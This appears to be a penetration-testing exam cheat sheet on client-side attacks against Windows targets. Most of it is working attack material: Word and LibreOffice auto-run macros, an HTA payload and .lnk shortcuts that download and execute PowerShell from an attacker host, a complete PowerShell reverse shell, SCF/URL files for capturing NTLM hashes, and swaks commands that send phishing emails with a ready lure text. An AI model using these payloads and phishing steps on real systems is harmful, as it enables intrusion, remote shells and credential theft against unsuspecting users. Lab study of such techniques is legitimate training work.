Client-Side Attacks Reference


Decision Tree

Can you send email to target?
├── YES → Word Macro (.doc) or Library File (.library-ms) + .lnk
│         └── SMTP server available? → deliver with swaks
└── NO
    ├── Writable SMB share?
    │   └── YES → Drop SCF/URL file → capture NTLMv2 hash → crack
    └── Can victim visit a URL?
        └── YES → HTA file hosted on your server

With assumed-breach format, client-side is less likely on exam. But know it for standalone boxes.

Quick Reference: What attack do I use?

I have…AttackBuild withDeliver with
SMTP + emails + Windows boxLibrary-ms + .lnktext editor + Windows GUIswaks
SMTP + emails (no Windows)Word macro .docLibreOfficeswaks
Web upload formODT macroLibreOffice GUIupload form
Writable SMB shareSCF/URL filetext editordrop in share + Responder
Victim visits your URLHTA filetext editorpython3 http.server

Word VBA Macro Attack

Step 1 — Generate Encoded Reverse Shell

# Encode PowerShell payload (UTF-16LE + Base64 — required for -enc flag)
python3 -c "
import base64,sys
cmd = sys.argv[1]
print(base64.b64encode(cmd.encode('utf-16-le')).decode())
" "IEX(New-Object System.Net.WebClient).DownloadString('http://ATTACKER/powercat.ps1');powercat -c ATTACKER -p 443 -e powershell"

Step 2 — Create Macro in Word

View → Macros → Create:

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    Str = "powershell.exe -nop -w hidden -enc "
    Str = Str + "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUA..."   ' chunk 1
    Str = Str + "YwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdA..."   ' chunk 2
    CreateObject("Wscript.Shell").Run Str
End Sub

⚠️ Save as .doc (Word 97-2003) — NOT .docx (macros won’t persist).

Python script to split base64 into VBA-safe 50-char chunks:

import sys
str = sys.argv[1]  # pass the base64 string as argument
n = 50
for i in range(0, len(str), n):
    print('Str = Str + "' + str[i:i+n] + '"')
# Usage: python3 split.py <BASE64_STRING>
# Paste output into the macro between the Str = "powershell..." line and CreateObject

Step 3 — Deliver

# Host PowerCat
cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
python3 -m http.server 80

# Listener
nc -nlvp 443

Windows Library File Attack (.library-ms)

Creates a fake library pointing to your WebDAV server. Victim opens it, Explorer connects, they see your malicious .lnk shortcut.

Step 1 — WebDAV Server

pip3 install wsgidav
mkdir ~/webdav
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root ~/webdav

Step 2 — Create Library File

Save as config.Library-ms:

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <n>@windows.storage.dll,-34582</n>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>http://ATTACKER_IP</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

Step 3 — Create Malicious Shortcut (.lnk)

On Windows (RDP), right-click Desktop > New > Shortcut. Use the SHORT powercat target (see full section below for why):

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://$KALI:8000/powercat.ps1'); powercat -c $KALI -p 4445 -e powershell"

Step 4 — Deliver via Email

swaks = SMTP Swiss Army Knife. Sends emails from command line.

# FIRST — test if email delivers (no attachment, just a test)
sudo swaks -t [email protected] --from [email protected] --server MAIL_IP --body "test" --header "Subject: test"

# Reading output:
#   RCPT TO -> 250 OK      = email DELIVERED
#   RCPT TO -> 550 Unknown  = rejected — try adding auth below

# If 550 — add SMTP authentication
sudo swaks -t [email protected] --from [email protected] --server MAIL_IP --body "test" --header "Subject: test" -ap -au SMTP_USER -ap SMTP_PASS

# swaks flags:
#   -t            = TO (recipient)
#   --from        = FROM (sender address)
#   --server      = mail server IP
#   -ap           = enable SMTP authentication
#   -au           = auth username (SMTP login — NOT necessarily the sender)
#   -ap           = auth password (found in config files, git repos, databases)
#   --attach @    = attach a file (@ means read from file path)
#   --body @      = email body from file (@ means read from file path)
#   --suppress-data = cleaner output

# REAL phishing email (after test works)
sudo swaks -t [email protected] --from [email protected] --attach @config.Library-ms --server MAIL_IP --body @body.txt --header "Subject: Staging Script" --suppress-data -ap -au SMTP_USER -ap SMTP_PASS

How to recognize SMTP credentials:

  • Found in config files with words like “email configuration”, “smtp”, “mail server”
  • Person mentioned as “contact” or “responsible” = phishing TARGET, not sender

LibreOffice ODT Macro Attack

Same concept as Word macros but for ODT documents. Use when upload forms accept ODT/document files and the server “reviews” or processes them automatically.

Step-by-step:

# 1. Create reverse shell script on Kali
cat > /home/kali/shell.ps1 << 'EOF'
$client = New-Object System.Net.Sockets.TCPClient("ATTACKER",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
EOF

# 2. Open LibreOffice
libreoffice --writer

Inside LibreOffice:

  1. Type fake content, File → Save Asresume.odt (MUST save first)
  2. Tools → Macros → Edit Macros
  3. In left panel, expand resume.odt → Standard → Module1 (NOT “My Macros”)
  4. Paste macro:
Sub Main
    Shell("cmd.exe /c powershell IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')")
End Sub
  1. Ctrl+S to save
  2. Tools → Customize → Events tab
  3. Change “Save in:” dropdown to resume.odt (NOT LibreOffice)
  4. Select Open Document → click Macro… → select resume.odt → Standard → Module1 → Main
  5. OK → OK → Ctrl+S again

Deploy:

# Terminal 1: serve shell.ps1
python3 -m http.server 80

# Terminal 2: listener
rlwrap nc -lvnp 4444

# Upload resume.odt through web form

Critical order (will fail if wrong):

Save document → add macro to DOCUMENT → save → set event trigger with “Save in: resume.odt” → save


HTA (HTML Application) Attack

<html>
<body>
<script>
var c = "powershell.exe -nop -w hidden -enc <BASE64>";
new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>
python3 -m http.server 80
# Victim visits: http://ATTACKER/evil.hta → browser prompts to open → shell

⚠️ msfvenom -f hta-pse counts as your ONE Metasploit use. Prefer manual HTA.


Forced Authentication via Writable Shares

Drop these files in a writable SMB share. When a user browses the share, Windows auto-loads the icon from your server → sends NTLMv2 hash.

SCF File (save as @inventory.scf — @ sorts to top)

[Shell]
Command=2
IconFile=\\ATTACKER_IP\share\icon.ico
[Taskbar]
Command=ToggleDesktop

URL File

[InternetShortcut]
URL=http://ATTACKER_IP/test
IconIndex=0
IconFile=\\ATTACKER_IP\share\icon.ico

Capture the Hash

sudo responder -I tun0 -v -A    # ANALYZE mode on exam!
# Or:
impacket-smbserver share . -smb2support

Crack the Captured NTLMv2 Hash

Responder prints an [SMB] NTLMv2-SSP Hash line — save that whole line to a file and crack it (NTLMv2 cannot be passed, it must be cracked):

hashcat -m 5600 ntlmv2.hash /usr/share/wordlists/rockyou.txt

See Hash Types and Password Attacks for more.


Payload Encoding Quick Reference

PowerShell requires UTF-16LE encoding before Base64:

# Python one-liner
python3 -c "
import base64,sys
cmd = sys.argv[1]
print(base64.b64encode(cmd.encode('utf-16-le')).decode())
" "YOUR_POWERSHELL_COMMAND_HERE"

# Use with:
powershell.exe -nop -w hidden -enc <OUTPUT>

Windows Library + WebDAV Phishing

Use when: You have valid domain creds + SMTP access but NO shell access (no WinRM/RDP/admin). Attack sends phishing email with .Library-ms file. Victim opens it, Windows Explorer connects to your WebDAV, victim clicks malicious .lnk, reverse shell.

The Chain

Email with .Library-ms attachment
  -> Victim opens .Library-ms
  -> Windows Explorer connects to YOUR WebDAV share (looks like a local folder)
  -> Victim sees a .lnk shortcut inside the folder
  -> Victim double-clicks .lnk
  -> .lnk runs PowerShell: downloads powercat.ps1 from your HTTP server
  -> powercat creates reverse shell back to your Netcat listener
  -> You have a shell on the victims internal workstation

Step 1: WebDAV Server on Kali (port 80)

pip install wsgidav
mkdir -p ~/webdav
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root ~/webdav/

Step 2: Create .Library-ms File

Tool: Any text editor (nano on Kali works fine). Its just XML. Save with .Library-ms extension. Save as config.Library-ms:

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<n>@windows.storage.dll,-34582</n>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://KALI_IP</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

Save this file in your working directory (NOT in the webdav folder). This file gets emailed as an attachment, it is NOT served by WebDAV.

Step 3: Create Malicious Shortcut (.lnk)

Tool: Windows GUI only. You CANNOT create .lnk on Linux. RDP in, right-click Desktop > New > Shortcut.

WARNING: Windows shortcut target has ~260 char limit. Base64-encoded payloads WILL be truncated and fail silently.

Use the SHORT powercat version (fits in the field):

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://KALI_IP:8000/powercat.ps1'); powercat -c KALI_IP -p 4444 -e powershell"

Do NOT use -enc with long base64 strings — they get cut off and you get no error, just nothing happens. Name it install. Transfer the .lnk into ~/webdav/ (the WebDAV root).

Step 4: Serve PowerCat (port 8000)

# Find powercat (path varies by Kali version)
find / -name powercat.ps1 2>/dev/null
# Common locations:
# /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1
# /usr/share/windows-resources/powercat/powercat.ps1
cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
python3 -m http.server 8000

Step 5: Start Listener (port 4444)

nc -nvlp 4444

Step 6: Send Phishing Email (from Kali)

See Step 4 above for full swaks flag reference. Quick one-liners:

# Without auth (open relay)
sudo swaks -t [email protected] --from [email protected] --attach @config.Library-ms --server MAIL_IP --body @body.txt --header "Subject: Staging Script" --suppress-data

# With auth (if above returns 550)
sudo swaks -t [email protected] --from [email protected] --attach @config.Library-ms --server MAIL_IP --body @body.txt --header "Subject: Staging Script" --suppress-data -ap -au SMTP_USER -ap SMTP_PASS

body.txt example:

Hey!
Please install the new security features on your workstation.
Download the attached file, double-click on it, and execute
the configuration shortcut within. Thanks!

4 Terminals Running Simultaneously

TerminalCommandPortPurpose
1wsgidav (WebDAV)80Hosts .lnk (victim browses here)
2python3 HTTP8000Serves powercat.ps1
3nc listener4444Catches reverse shell
4swaksSends phishing email

What goes where (easy to mix up under pressure)

FileCreated onLives whereHow victim gets it
config.Library-msKali (text editor - just XML)Emailed as attachment via swaksVictim opens in Explorer
powercat.ps1Kali (copy from /usr/share/powershell-empire/…)Served by python3 http.server :8000.lnk downloads it automatically

Key Points

  • .Library-ms = EMAIL ATTACHMENT (not in webdav folder)
  • .lnk = INSIDE webdav folder (victim sees it after opening Library file)
  • WebDAV must be on port 80 (Windows Explorer expects this)
  • Library file URL = your Kali IP, no trailing path
  • swaks -ap = password authentication to mail server
  • After shell: upload winPEAS, run SharpHound, set up Meterpreter+SOCKS for pivoting

Troubleshooting (when phishing does not work)

  1. Did swaks deliver? Look for “250 OK” or “250 Queued” in swaks output. If you see errors, the email was not sent.
  2. Try WITHOUT -ap first. Many lab mail servers are open relays. The -ap flag forces authentication which may not be needed.
  3. No WebDAV connections? The Library-ms URL is wrong or the email was not opened. Check the URL inside the XML matches your Kali IP exactly.
  4. WebDAV connects but no shell? The .lnk payload is broken. Check the powercat command, verify ports match your listener.
  5. Try ALL email formats: [email protected], [email protected], [email protected]
  6. Try ALL employees. Send to every name you found, not just one.
  7. Wait 1-2 minutes. Simulated users do not click instantly.
  8. config.Library-ms goes as swaks attachment, NOT in the webdav folder.
  9. Use sudo with swaks if sending on port 25 (privileged port).